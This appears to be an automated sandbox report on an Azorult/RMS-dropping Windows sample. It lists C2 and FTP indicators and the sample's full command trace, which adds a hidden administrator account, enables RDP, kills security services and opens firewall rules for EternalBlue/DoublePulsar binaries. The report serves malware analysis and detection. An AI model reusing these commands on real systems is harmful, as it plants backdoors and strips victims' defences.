Analysis
-
max time kernel
147s -
max time network
170s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-11-2020 16:58
General
-
Target
LtHv0O2KZDK4M637.exe
Score
10/10
Malware Config
Extracted
Credentials
Protocol: ftp- Host:
109.248.203.81 - Port:
21 - Username:
alex - Password:
easypassword
Extracted
Family
azorult
C2
http://195.245.112.115/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
UAC bypass 3 TTPs
-
Windows security bypass 2 TTPs
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
ASPack v2.12-2.42 9 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocks application from running via registry modification
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 4 IoCs
-
Executes dropped EXE 18 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 7 IoCs
-
Modifies file permissions 1 TTPs 64 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Modifies WinLogon 2 TTPs 7 IoCs
-
Drops file in Program Files directory 31 IoCs
-
Drops file in Windows directory 8 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 9 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 6 IoCs
-
Modifies registry class 6 IoCs
-
NTFS ADS 2 IoCs
-
Runs .reg file with regedit 2 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 11 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 3 IoCs
-
Views/modifies file attributes 1 TTPs 31 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies WinLogon
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10005⤵
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own5⤵
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"5⤵
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Windows Mail\WinMail.exe"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE4⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE5⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
-
C:\ProgramData\install\sys.exeC:\ProgramData\install\sys.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 34⤵
- Delays execution with timeout.exe
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui2⤵
- Executes dropped EXE
-
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns5⤵
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns6⤵
- Gathers network information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force5⤵
-
C:\Windows\system32\gpupdate.exegpupdate /force6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)5⤵
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "6⤵
- Modifies registry class
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "8⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f9⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f9⤵
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow9⤵
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add10⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o9⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow10⤵
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f9⤵
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited10⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"9⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc4⤵
-
C:\Windows\SysWOW64\sc.exesc start appidsvc5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt4⤵
-
C:\Windows\SysWOW64\sc.exesc start appmgmt5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice4⤵
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice4⤵
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice4⤵
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice4⤵
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer4⤵
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle4⤵
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_644⤵
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_645⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql4⤵
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.2484⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.2485⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.2555⤵
-
